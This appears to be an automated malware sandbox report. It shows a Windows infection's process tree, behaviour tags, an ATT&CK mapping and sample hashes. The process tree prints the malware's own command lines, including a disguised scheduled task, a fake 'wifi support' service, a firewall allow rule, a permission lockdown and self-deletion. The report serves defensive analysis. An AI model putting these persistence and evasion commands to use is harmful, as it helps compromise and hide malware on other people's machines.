C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15e2f113a40ce5.exeWed15e2f113a40ce5.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15e2f113a40ce5.exeC:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15e2f113a40ce5.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15e2f113a40ce5.exeC:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15e2f113a40ce5.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15ac1df9305ded09.exeWed15ac1df9305ded09.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed1529d8198a8f0c1.exeWed1529d8198a8f0c1.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1631231.scr"C:\Users\Admin\AppData\Roaming\1631231.scr" /S2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7712201.scr"C:\Users\Admin\AppData\Roaming\7712201.scr" /S2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6517854.scr"C:\Users\Admin\AppData\Roaming\6517854.scr" /S2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6020523.scr"C:\Users\Admin\AppData\Roaming\6020523.scr" /S2⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 505B6BA862F63A8AB5B73FBD51224993 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 310AD5F23E87302959D44F6907B61F142⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 216B61B1F8F77F6832F1503BA7C052CF E Global\MSI00002⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Users\Admin\AppData\Local\Temp\DCCF.exeC:\Users\Admin\AppData\Local\Temp\DCCF.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\DCCF.exeC:\Users\Admin\AppData\Local\Temp\DCCF.exe2⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\DCCF.exe"C:\Users\Admin\AppData\Local\Temp\DCCF.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\DCCF.exe"C:\Users\Admin\AppData\Local\Temp\DCCF.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build2.exe"C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build2.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build2.exe"C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build2.exe"6⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build2.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build3.exe"C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build3.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build3.exe"C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build3.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Executes dropped EXE
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\FC10.exeC:\Users\Admin\AppData\Local\Temp\FC10.exe1⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\52FB.exeC:\Users\Admin\AppData\Local\Temp\52FB.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\52FB.exeC:\Users\Admin\AppData\Local\Temp\52FB.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7BB2.exeC:\Users\Admin\AppData\Local\Temp\7BB2.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7BB2.exeC:\Users\Admin\AppData\Local\Temp\7BB2.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7BB2.exeC:\Users\Admin\AppData\Local\Temp\7BB2.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\BADF.exeC:\Users\Admin\AppData\Local\Temp\BADF.exe1⤵
-
C:\Users\Admin\AppData\Roaming\BADF.exe"C:\Users\Admin\AppData\Roaming\BADF.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Self.bat" "3⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12514⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Roaming\BADF.exe3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 04⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Self.bat" "2⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12513⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del BADF.exe2⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 03⤵
-
C:\Users\Admin\AppData\Local\Temp\E079.exeC:\Users\Admin\AppData\Local\Temp\E079.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\lblmweuz\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wmhtnzdv.exe" C:\Windows\SysWOW64\lblmweuz\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create lblmweuz binPath= "C:\Windows\SysWOW64\lblmweuz\wmhtnzdv.exe /d\"C:\Users\Admin\AppData\Local\Temp\E079.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description lblmweuz "wifi internet conection"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start lblmweuz2⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
C:\Users\Admin\yojvpbfx.exe"C:\Users\Admin\yojvpbfx.exe" /d"C:\Users\Admin\AppData\Local\Temp\E079.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rykxgtuo.exe" C:\Windows\SysWOW64\lblmweuz\3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config lblmweuz binPath= "C:\Windows\SysWOW64\lblmweuz\rykxgtuo.exe /d\"C:\Users\Admin\yojvpbfx.exe\""3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start lblmweuz3⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8607.bat" "3⤵
-
C:\Users\Admin\AppData\Local\Temp\E60.exeC:\Users\Admin\AppData\Local\Temp\E60.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Users\Admin\AppData\Local\Temp\2A94.exeC:\Users\Admin\AppData\Local\Temp\2A94.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7792 -s 2642⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\68A8.exeC:\Users\Admin\AppData\Local\Temp\68A8.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\InternodesPiets_2021-09-29_21-00.exe"C:\Users\Admin\AppData\Local\Temp\InternodesPiets_2021-09-29_21-00.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\Money10k_.exe"C:\Users\Admin\AppData\Local\Temp\Money10k_.exe"2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Adds Run key to start application
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess1⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.170.0822.0002\FileSyncConfig.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.170.0822.0002\FileSyncConfig.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\406F.exeC:\Users\Admin\AppData\Local\Temp\406F.exe1⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 406F.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\406F.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 406F.exe /f3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\5957.exeC:\Users\Admin\AppData\Local\Temp\5957.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\2483.exeC:\Users\Admin\AppData\Local\Temp\2483.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\CF58.exeC:\Users\Admin\AppData\Local\Temp\CF58.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\CF58.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
2Change Default File Association
1Registry Run Keys / Startup Folder
2New Service
1Scheduled Task
1BITS Jobs
1Defense Evasion
Modify Registry
7Disabling Security Tools
3Virtualization/Sandbox Evasion
1File Permissions Modification
1BITS Jobs
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed150b6a68b74a9.exeMD5
b7f786e9b13e11ca4f861db44e9fdc68
SHA1bcc51246a662c22a7379be4d8388c2b08c3a3248
SHA256f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6
SHA51253185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5
